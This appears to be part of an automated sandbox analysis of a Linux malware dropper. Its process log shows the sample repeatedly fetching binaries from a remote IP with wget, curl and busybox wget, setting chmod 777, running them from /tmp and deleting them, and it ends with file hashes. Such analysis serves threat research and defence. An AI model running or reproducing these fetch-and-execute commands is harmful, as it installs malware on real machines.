PID:924
-
-
/bin/busybox/bin/busybox wget http://87.120.84.230/bins/AiN2qqyOhu5NO4QbTIbOn0CoXWMfXayJ7a2⤵PID:925
-
-
/bin/chmodchmod 777 AiN2qqyOhu5NO4QbTIbOn0CoXWMfXayJ7a2⤵
- File and Directory Permissions Modification
PID:926
-
-
/tmp/AiN2qqyOhu5NO4QbTIbOn0CoXWMfXayJ7a./AiN2qqyOhu5NO4QbTIbOn0CoXWMfXayJ7a2⤵
- Executes dropped EXE
PID:927
-
-
/bin/rmrm AiN2qqyOhu5NO4QbTIbOn0CoXWMfXayJ7a2⤵PID:928
-
-
/usr/bin/wgetwget http://87.120.84.230/bins/phFMgsQArmVdg945D14ipduIUYswPNrcK12⤵
- System Network Configuration Discovery
PID:929
-
-
/usr/bin/curlcurl -O http://87.120.84.230/bins/phFMgsQArmVdg945D14ipduIUYswPNrcK12⤵
- Reads runtime system information
- System Network Configuration Discovery
- Writes file to tmp directory
PID:930
-
-
/bin/busybox/bin/busybox wget http://87.120.84.230/bins/phFMgsQArmVdg945D14ipduIUYswPNrcK12⤵
- System Network Configuration Discovery
PID:931
-
-
/bin/chmodchmod 777 phFMgsQArmVdg945D14ipduIUYswPNrcK12⤵
- File and Directory Permissions Modification
PID:932
-
-
/tmp/phFMgsQArmVdg945D14ipduIUYswPNrcK1./phFMgsQArmVdg945D14ipduIUYswPNrcK12⤵
- Executes dropped EXE
- System Network Configuration Discovery
PID:933
-
-
/bin/rmrm phFMgsQArmVdg945D14ipduIUYswPNrcK12⤵
- System Network Configuration Discovery
PID:934
-
-
/usr/bin/wgetwget http://87.120.84.230/bins/NPEIwffrDkzflwPJOJKEn3TnSTYQNyyAOh2⤵PID:935
-
-
/usr/bin/curlcurl -O http://87.120.84.230/bins/NPEIwffrDkzflwPJOJKEn3TnSTYQNyyAOh2⤵
- Reads runtime system information
- Writes file to tmp directory
PID:936
-
-
/bin/busybox/bin/busybox wget http://87.120.84.230/bins/NPEIwffrDkzflwPJOJKEn3TnSTYQNyyAOh2⤵PID:937
-
-
/bin/chmodchmod 777 NPEIwffrDkzflwPJOJKEn3TnSTYQNyyAOh2⤵
- File and Directory Permissions Modification
PID:938
-
-
/tmp/NPEIwffrDkzflwPJOJKEn3TnSTYQNyyAOh./NPEIwffrDkzflwPJOJKEn3TnSTYQNyyAOh2⤵
- Executes dropped EXE
PID:939
-
-
/bin/rmrm NPEIwffrDkzflwPJOJKEn3TnSTYQNyyAOh2⤵PID:940
-
-
/usr/bin/wgetwget http://87.120.84.230/bins/VKemfdmJuQsAHmB9faf3IEsH2aZZnpMryG2⤵PID:941
-
-
/usr/bin/curlcurl -O http://87.120.84.230/bins/VKemfdmJuQsAHmB9faf3IEsH2aZZnpMryG2⤵
- Reads runtime system information
- Writes file to tmp directory
PID:942
-
-
/bin/busybox/bin/busybox wget http://87.120.84.230/bins/VKemfdmJuQsAHmB9faf3IEsH2aZZnpMryG2⤵PID:943
-
-
/bin/chmodchmod 777 VKemfdmJuQsAHmB9faf3IEsH2aZZnpMryG2⤵
- File and Directory Permissions Modification
PID:944
-
-
/tmp/VKemfdmJuQsAHmB9faf3IEsH2aZZnpMryG./VKemfdmJuQsAHmB9faf3IEsH2aZZnpMryG2⤵
- Executes dropped EXE
PID:945
-
-
/bin/rmrm VKemfdmJuQsAHmB9faf3IEsH2aZZnpMryG2⤵PID:946
-
-
/usr/bin/wgetwget http://87.120.84.230/bins/YrQOP5pbycr0oqyLtWdgrfWC6qI5gjD2gP2⤵PID:947
-
-
/usr/bin/curlcurl -O http://87.120.84.230/bins/YrQOP5pbycr0oqyLtWdgrfWC6qI5gjD2gP2⤵
- Reads runtime system information
- Writes file to tmp directory
PID:948
-
-
/bin/busybox/bin/busybox wget http://87.120.84.230/bins/YrQOP5pbycr0oqyLtWdgrfWC6qI5gjD2gP2⤵PID:949
-
-
/bin/chmodchmod 777 YrQOP5pbycr0oqyLtWdgrfWC6qI5gjD2gP2⤵
- File and Directory Permissions Modification
PID:950
-
-
/tmp/YrQOP5pbycr0oqyLtWdgrfWC6qI5gjD2gP./YrQOP5pbycr0oqyLtWdgrfWC6qI5gjD2gP2⤵
- Executes dropped EXE
PID:951
-
-
/bin/rmrm YrQOP5pbycr0oqyLtWdgrfWC6qI5gjD2gP2⤵PID:952
-
-
/usr/bin/wgetwget http://87.120.84.230/bins/3SrM4CtzjYWyrkrIWxSxPaJQUaWQLXutHC2⤵PID:953
-
-
/usr/bin/curlcurl -O http://87.120.84.230/bins/3SrM4CtzjYWyrkrIWxSxPaJQUaWQLXutHC2⤵
- Reads runtime system information
- Writes file to tmp directory
PID:954
-
-
/bin/busybox/bin/busybox wget http://87.120.84.230/bins/3SrM4CtzjYWyrkrIWxSxPaJQUaWQLXutHC2⤵PID:955
-
-
/bin/chmodchmod 777 3SrM4CtzjYWyrkrIWxSxPaJQUaWQLXutHC2⤵
- File and Directory Permissions Modification
PID:956
-
-
/tmp/3SrM4CtzjYWyrkrIWxSxPaJQUaWQLXutHC./3SrM4CtzjYWyrkrIWxSxPaJQUaWQLXutHC2⤵
- Executes dropped EXE
PID:957
-
-
/bin/rmrm 3SrM4CtzjYWyrkrIWxSxPaJQUaWQLXutHC2⤵PID:958
-
-
/usr/bin/wgetwget http://87.120.84.230/bins/LkORURb6UsJB4YDCaSHURVJpnssGyXSEHM2⤵PID:959
-
-
/usr/bin/curlcurl -O http://87.120.84.230/bins/LkORURb6UsJB4YDCaSHURVJpnssGyXSEHM2⤵
- Reads runtime system information
- Writes file to tmp directory
PID:960
-
-
/bin/busybox/bin/busybox wget http://87.120.84.230/bins/LkORURb6UsJB4YDCaSHURVJpnssGyXSEHM2⤵PID:961
-
-
/bin/chmodchmod 777 LkORURb6UsJB4YDCaSHURVJpnssGyXSEHM2⤵
- File and Directory Permissions Modification
PID:962
-
-
/tmp/LkORURb6UsJB4YDCaSHURVJpnssGyXSEHM./LkORURb6UsJB4YDCaSHURVJpnssGyXSEHM2⤵
- Executes dropped EXE
PID:963
-
-
/bin/rmrm LkORURb6UsJB4YDCaSHURVJpnssGyXSEHM2⤵PID:964
-
-
/usr/bin/wgetwget http://87.120.84.230/bins/zAvCXOWX1g8pqYnWYeZ9xRDciqn79kUfIK2⤵PID:965
-
-
/usr/bin/curlcurl -O http://87.120.84.230/bins/zAvCXOWX1g8pqYnWYeZ9xRDciqn79kUfIK2⤵
- Reads runtime system information
- Writes file to tmp directory
PID:966
-
-
/bin/busybox/bin/busybox wget http://87.120.84.230/bins/zAvCXOWX1g8pqYnWYeZ9xRDciqn79kUfIK2⤵PID:967
-
-
/bin/chmodchmod 777 zAvCXOWX1g8pqYnWYeZ9xRDciqn79kUfIK2⤵
- File and Directory Permissions Modification
PID:968
-
-
/tmp/zAvCXOWX1g8pqYnWYeZ9xRDciqn79kUfIK./zAvCXOWX1g8pqYnWYeZ9xRDciqn79kUfIK2⤵
- Executes dropped EXE
PID:969
-
-
/bin/rmrm zAvCXOWX1g8pqYnWYeZ9xRDciqn79kUfIK2⤵PID:970
-
Network
MITRE ATT&CK Enterprise v15
Replay Monitor
Loading Replay Monitor...
Downloads
-
Filesize
153B
MD5998368d7c95ea4293237f2320546e440
SHA130dfd2d3bb8a7e3241bd7792e90a98ebb70be3a4
SHA256533a1ca5d6595793725bca7641d9461a0f00dd1732dded3e4281196f5dd21736
SHA512648c4720a85dbf834be1ba00f0e1b4167cc670fe15896efb00a77fb6e0c225a13aae3da10d85fa6e7f726420d9bb3c20c43466e02296d44153c127b7160e0b97